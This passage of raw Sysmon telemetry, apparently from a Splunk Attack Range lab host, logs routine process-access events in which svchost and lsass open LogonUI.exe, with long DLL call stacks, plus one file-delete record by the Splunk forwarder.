indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291970Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291969Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291968Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291967Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291966Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291965Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291964Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291963Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291962Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291961Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291960Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291959Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291958Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291957Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291956Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291955Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291954Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291953Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291952Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291951Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291950Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C2-6086-0F00-00000000BB01}9366092C:\Windows\System32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291949Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291948Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.661{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291947Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.659{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C95F834EB0598865E329A7774A4C7B5C,SHA256=2BFCBB97CA6CFB64AB362E3C3CD06ABB462C18535D4794F663DCE6ADDDB872FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291946Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 